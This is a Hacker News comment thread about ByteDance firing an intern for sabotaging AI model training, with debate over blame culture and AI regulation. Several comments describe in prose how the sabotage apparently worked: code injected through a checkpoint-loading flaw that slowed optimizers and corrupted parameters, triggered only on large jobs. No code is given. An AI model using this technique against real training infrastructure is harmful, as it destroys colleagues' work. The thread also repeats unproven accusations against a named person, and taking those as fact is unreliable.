peterkos 4 hours ago

I'm reminded of a time that an intern took down us-east1 on AWS, by modifying a configuration file they shouldn't have had access to. Amazon (somehow) did the correct thing and didn't fire them -- instead, they used the experience to fix the security hole. It was a file they shouldn't have had access to in the first place.

If the intern "had no experience with the AI lab", is it the right thing to do to fire them, instead of admitting that there is a security/access fault internally? Can other employees (intentionally, or unintentionally) cause that same amount of "damage"?

  • grogenaut 4 hours ago

    From what I've seen in Amazon it's pretty consistent that they do not blame the messenger which is what they consider the person who messed up. Usually that person is the last in a long series of decisions that could have prevented the issue, and thus why blame them. That is unless the person is a) acting with malice, b) is repeatedly shown a pattern of willful ignorance. IIRC, when one person took down S3 with a manual command overriding the safeguards the action was not to fire them but to figure out why it was still a manual process without sign off. Say what you will about Amazon culture, the ability to make mistakes or call them out is pretty consistently protected.

    • tgavVs 3 hours ago

      > From what I've seen in Amazon it's pretty consistent that they do not blame the messenger which is what they consider the person who messed up

      Interesting that my experience has been the exact opposite.

      Whenever I’ve participated in COE discussions (incident analysis), questions have been focused on highlighting who made the mistake or who didn’t take the right precautions.

      • grogenaut 3 hours ago

        I've bar raised a ton of them. You do end up figuring out what actions by what operator caused what issues or didn't work well, but that's to diagnose what controls/processes/tools/metrics were missing. I always removed the actual people's name as part of the bar raising, well before publishing, usually before any manager sees it. Instead used Oncall 1, or Oncall for X team, Manager for X team. And that's mainly for the timeline.

        As a sibling said you were likely in a bad or or one that was using COEs punatively.

        • mlyle 2 hours ago

          In the article's case, there's evidence of actual malice, though-- sabotaging only large jobs, over a month's time.

          • fragmede 2 hours ago

            All I got from the linked article was

            > TikTok owner, ByteDance, says it has sacked an intern for "maliciously interfering" with the training of one of its artificial intelligence (AI) models.

            Are there other links with additional info?

            • mlyle an hour ago

              A lot of the original social media sources have been pulled, but this is what was alleged on social media:

              https://juejin.cn/post/7426926600422637594

              https://github.com/JusticeFighterDance/JusticeFighter110

              https://x.com/0xKyon/status/1847529300163252474

              • fragmede an hour ago

                Thanks. Google translate off the first link:

                > He exploited the vulnerability of huggingface's load ckpt function to inject code, dynamically modifying other people's optimizer to randomly sleep for a short period of time, and modifying the direction of parameter shaving. He also added a condition that only tasks with more than 256 cards would trigger this condition.

                Okay yeah that's malicious and totally a crime. "modifying the direction of parameter shaving" means he subtly corrupted his co-workers work. that's wild!

                • mlyle an hour ago

                  Some of the sources say that he sat in the incident meetings during troubleshooting and adjusted his attacks to avoid detection, too.

      • geon 2 hours ago

        Isn't that a necessary step in figuring out the issue and how t prevent it?

      • dockerd 3 hours ago

        That was not the idea of COE ever. Probably you were in bad org/team.

    • evanextreme 2 hours ago

      At least in my experience, this is also how Azure continues to function. Certainly reduces stress in the working environment

  • bawolff 2 hours ago

    There is a huge difference between someone making a mistake and someone intentionally sabotaging.

    You're not firing the person because they broke stuff, you are firing them because they tried to break stuff. If the attempt was a failure and caused no harm, you would still fire them. Its not about the damage they caused its that they wanted to cause damage.

    • xnavra50 an hour ago

      What if the intern did accidental mistake, but the company painted it as intentional sabotage? Nothing new in communism.

      • Jensson an hour ago

        They were just fired, not put in prison or sued. Getting fired is a typical capitalist punishment, I'd bet way more engineers gets fired for mistakes in USA than China.

    • ozim 2 hours ago

      But for damaging company assets on purpose firing is only first step.

      I do not see any mention of other legal action and article is shallow.

      It might’ve been that someone in command chain called it “malicious” to cover up his own mistakes. I think that is parent poster point while writing out Amazon story.

      • bawolff 2 hours ago

        Maybe, but without any other info, i kind of have to take the info provided at face value. Like obviously if the article is inaccurate the whole situation should be viewed differently.

  • kleton 3 hours ago

    It was one of the STEP interns that took down Google prod by modifying some config file by putting something erroneous into an automated tool. Everyone at the company was locked out, and someone had to physically access some machines in a datacenter to recover.

  • EE84M3i 3 hours ago

    I'd like to learn more about the AWS incident, but when I google "us-east1 intern" I get this comment. Do you have a link?

  • dudus 4 hours ago

    The difference in this case is intent.

    Did the employee have the intent to cause damage? If so just fire him/her.

    • danpalmer 3 hours ago

      Malicious intent to be precise. Well-intentioned attempts to demonstrate issues for the purposes of helping to fix should generally not be punished, unless there is a wider fallout than expected and that can be attributed to negligence.

  • raihansaputra 4 hours ago

    afaik this was intentional in that they stopped training runs and changing parameters for other employee training runs, and even joined in on the debugging group trying to solve the "issues".

aimazon an hour ago
  • yapyap 41 minutes ago

    whats this mean for us non chinese folk

    • xvector 30 minutes ago

      Translated by ChatGPT.

      Summary:

      10/18:

      Translation of the provided text:

      Title: Urgent Warning

      The “reputation washing” behavior of Tian Keyu has been extremely harmful

      For the past two months, Tian Keyu has maliciously attacked the cluster code, causing significant harm to nearly 30 employees of various levels, wasting nearly a quarter’s worth of work by his colleagues. All records and audits clearly confirm these undeniable facts:

      1. Modified the PyTorch source code of the cluster, including random seeds, optimizers, and data loaders.

      2. Randomly killed multi-machine experiment processes, causing significant experiment delays.

      3. Opened login backdoors through checkpoints, automatically initiating random process terminations.

      4. Participated in daily troubleshooting meetings for cluster faults, continuing to modify attack codes based on colleagues’ troubleshooting ideas.

      5. Altered colleagues’ model weights, rendering experimental results unreproducible.

      It’s unimaginable how Tian Keyu could continue his attacks with such malice, seeing colleagues’ experiments inexplicably interrupted or fail, after hearing their debugging strategies and specifically modifying the attack codes in response, and witnessing colleagues working overnight with no progress. After being dismissed by the company, he received no penalties from the school or advisors and even began to whitewash his actions on various social media platforms. Is this the school and advisors’ tolerance of Tian Keyu’s behavior? We expect this evidence disclosure to attract the attention of relevant parties and for definitive penalties to be imposed on Tian Keyu, reflecting the social responsibility of higher education institutions to educate and nurture.

      We cannot allow someone who has committed such serious offenses to continue evading justice, even beginning to distort facts and whitewash his wrongdoing! Therefore, we decide to stand on behalf of all justice advocates and reveal the evidence of Tian Keyu’s malicious cluster attack!

      Tian Keyu, if you deny any part of these malicious attack behaviors, or think the content here smears you, please present credible evidence! We are willing to disclose more evidence as the situation develops, along with your shameless ongoing attempts to whitewash. We guarantee the authenticity and accuracy of all evidence and are legally responsible for the content of the evidence. If necessary, we are willing to disclose our identities and confront Tian Keyu face-to-face.

      Thanks to those justice advocates, you do not need to apologize; you are heroes who dare to speak out.

      Link to the inquiry recording of Tian Keyu: https://www.youtube.com/watch?v=nEYbYW--qN8

      Personal homepage of Tian Keyu: https://scholar.google.com/citations?user=6FdkbygAAAAJ&hl=en

      GitHub homepage of Tian Keyu: https://github.com/keyu-tian

      10/19:

      Clarification Regarding the “Intern Sabotaging Large Model Training” Incident

      Recently, some media reported that “ByteDance’s large model training was attacked by an intern.” After internal verification by the company, it was confirmed that an intern from the commercial technology team committed a serious disciplinary violation and has been dismissed. However, the related reports also contain some exaggerations and inaccuracies, which are clarified as follows:

      1. The intern involved maliciously interfered with the model training tasks of the commercial technology team’s research project, but this did not affect the official commercial projects or online operations, nor did it involve ByteDance’s large model or other businesses.

      2. Rumors on the internet about “involving over 8,000 cards and losses of millions of dollars” are greatly exaggerated.

      3. Upon verification, it was confirmed that the individual in question had been interning in the commercial technology team, and had no experience interning at AI Lab. Their social media bio and some media reports are incorrect.

      The intern was dismissed by the company in August. The company has also reported their behavior to the industry alliance and the school they attend, leaving further actions to be handled by the school.

rollulus an hour ago

This article merely relays what ByteDance says, so it’s nothing but PR, unrelated to journalism. No idea what it’s doing on bbc.com.

  • quietbritishjim an hour ago

    Not really. It says:

    > ByteDance also denied reports that the incident caused more than $10m of damage

    It makes clear what ByteDance's official position is, while pretty clearly hinting that it might not be true.

needaname 2 hours ago

It was a phd student that was mad about compensation or something purposely injecting malicious code.

anigbrowl 2 hours ago

I feel less informed after reading the article than I did after reading the headline.

yapyap 42 minutes ago

> Its commercial online operations, including its large language AI models, were unaffected by the intern's actions, the company added.

so did something actually happen or did they just post some inaccuracies on social media

userbinator 4 hours ago

I hope said intern finds a new job working for anti-AI causes.

  • bawolff 2 hours ago

    People who sabotage things tend to do it against all sides (you can always find an excuse to sabotage if you try hard enough).

    • tommica an hour ago

      > People who sabotage things tend to do it against all sides (you can always find an excuse to sabotage if you try hard enough).

      'Holy Generalization, Batman!'

  • 0xDEAFBEAD 3 hours ago

    Are there are a lot of anti-AI organizations at this point? PauseAI is the main one I'm familiar with:

    https://pauseai.info/

    One thing I suspect investors in e.g. OpenAI are failing to price in is the political and regulatory headwinds OpenAI will face if their fantastical revenue projections actually materialize. A world where OpenAI is making $100B in annual revenue will likely be a world where technological unemployment looms quite clearly. Polls already show strong support for regulating AI.

    • sadeshmukh an hour ago

      Regulation supports the big players. See SB 1047 in California and read the first few lines: > comply with various requirements, including implementing the capability to promptly enact a full shutdown, as defined, and implement a written and separate safety and security protocol, as specified

      That absolutely kills open source, and it's disguised as a "safety" bill where safety means absolutely nothing (how are you "shutting down" an LLM?). There's a reason Anthropic was championing it even though it evidently regulates AI.

    • jazzyjackson 2 hours ago

      The Amish?

      I'm trying to think of whether it'd be worth starting some kind of semi-Luddite community where we can use digital technology, photos, radios, spreadsheets and all, but the line is around 2014, when computers still did the same thing every time. That's my biggest gripe with AI, the nondeterminism, the non-repeatability making it all undebuggable, impossible to interrogate and reason about. A computer in 2014 is complex but not incomprehensible. The mass matrix multiplication of 2024 computation is totally opaque and frankly I think there's room for a society without such black box oracles.

      • fragmede an hour ago

        Why 2014? Why not 2022 when ChatGPT was released? Or 2019 for ChatGPT 2? Why not 2005 when the first dual-core Pentium was released? After that, the two cores meant that you could be sure what order your program would run things. Or why not 2012 when Intel added the RdRand instruction to x86? Or 2021 when Linux 5.17 was released with random number generation improvements? Or 1985 when IEEE 754 floating point was released. Before that, it was all integer math but after that, 0.1 + 0.2 = 0.30000000000000004. Not that I have any objection to 2014, I'm just wondering why you chose then.

    • bawolff 2 hours ago

      Regulation is not neccesarily bad for the market leader.

  • xvector 25 minutes ago

    I hope he spends a good long bit in prison. He committed a serious crime here.

dankle 3 hours ago

What a non-story.

  • xvector 23 minutes ago

    BBC is trash. This guy sabotaged ByteDance's LLM. That is huge news - billions down the drain.

    See the comments above for the translated Chinese version of what he did.

radu_floricica an hour ago

"maliciously interfering" does a lot of the lifting here. And if true, I hope that they didn't stop at firing him. Play stupid games, win stupid prizes. I hate the kind of entitlement that makes people feel justified to destroy huge amounts of value.

aaron695 3 hours ago

Wow BBC is garbage.

https://x.com/le1du/status/1847144170705785239

  Rumor says an intern at ByteDance was jailed for sabotaging their GPU cluster. Over 8000 H100 GPUs ran corrupted code for a month , all because he was frustrated with resources being diverted from his research to a GenAI project.

   was told the intern used a bug in hugginface's load ckpt function to inject bad code. The code randomly change other tasks' parameter and get them sleep, only targeting  training tasks using  more than 256 cards
You could track down the direct Chinese rumor, but you'd have to leave the cyber basement. Big nono for HN, it can't even eat Americanized Chinese digital food like TikTok ( Chinese version - https://portal.sina.com.hk/others/sina/2024/10/20/1013680/%E... )
  • viraptor 3 hours ago

    The article quoting specific responses is garbage, here's a tweet explicitly stating it includes a rumour? What are you trying to say here?

    • iamacyborg 2 hours ago

      He’s basically highlighting why the media is dead. Gullible folks would rather read salacious rumours than actual news.